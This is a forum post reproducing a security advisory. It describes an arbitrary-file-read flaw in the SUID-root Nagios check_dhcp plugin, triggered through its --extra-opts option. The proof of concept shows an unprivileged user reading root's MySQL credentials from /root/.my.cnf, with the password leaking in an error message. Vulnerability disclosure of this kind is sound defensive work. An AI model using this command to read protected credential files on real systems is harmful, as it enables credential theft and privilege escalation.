Announcement Announcement Module
Collapse
No announcement yet.
Nagios Plugins check_dhcp Arbitrary File Read Page Title Module
Move Remove Collapse
X
Conversation Detail Module
Collapse
  • Filter
  • Time
  • Show
Clear All
new posts

  • Nagios Plugins check_dhcp Arbitrary File Read

    Nagios plugin check_dhcp requires a root SUID permission on the program binary file in order to run
    correctly. Default installation of check_dhcp will set SUID permission automatically.

    # ./configure ; make ; make install

    # ls -l /usr/local/nagios/libexec/check_dhcp
    -r-sr-xr-x 1 root root 171188 May 12 23:26 /usr/local/nagios/libexec/check_dhcp


    As we can see in the provided help the plugin allows for reading options from a
    supplied config file by using --extra-opts option:

    # /usr/local/nagios/libexec/check_dhcp --help
    check_dhcp v2.0.1 (nagios-plugins 2.0.1)
    ...
    Usage:
    check_dhcp [-v] [-u] [-s serverip] [-r requestedip] [-t timeout]
    [-i interface] [-m mac]

    Options:
    ...
    --extra-opts=[section][@file]
    Read options from an ini file. See
    https://www.nagios-plugins.org/doc/extra-opts.html
    for usage and examples.


    The option could be used to read parts of any INI format config files
    available on the system. Because check_dhcp is running as root (thanks
    to SETUID bit) and does not drop the root privileges when accessing the
    config file nor does it check if a given file should be accessible by the
    user executing it any root ini-config file can be accessed this way by an
    unprivileged user on the local system.

    PROOF OF CONCEPT


    A good example of a program that stores configuration in INI format is MySQL.
    Administrators often save mysql credentials in /root/.my.cnf to avoid having
    to type them each time when running a mysql client. Storing mysql passwords in
    a config file is also suggested for safety in MySQL docs :
    http://dev.mysql.com/doc/refman/5.7/...rity-user.html

    An example mysql config file could look like this:
    Code:
     
    
    root@server [~]# cat /root/.my.cnf
    [client]
    password="nzk?V5l-"
    user=root
    If an unprivileged user can access to a system containing SUID binary of
    check_dhcp plugin he could easily use it to retrieve the password contained
    in /root/.my.cnf file:

    prajith@server[~]$ id
    uid=1000(prajith) gid=1000(prajith) groups=1000(prajith)

    [prajith@server[~]$ /usr/local/nagios/libexec/check_dhcp -v --extra-opts=client@/root/.my.cnf
    /usr/local/nagios/libexec/check_dhcp: unrecognized option '--password=nzk?V5l-'
    Usage:
    check_dhcp [-v] [-u] [-s serverip] [-r requestedip] [-t timeout]
    [-i interface] [-m mac]


    As we can see the contents of the 'client' section of /root/.my.cnf option
    file gets printed as a part of the error message.


    CREDITS

    The vulnerability has been discovered by legalhackers
Working...
X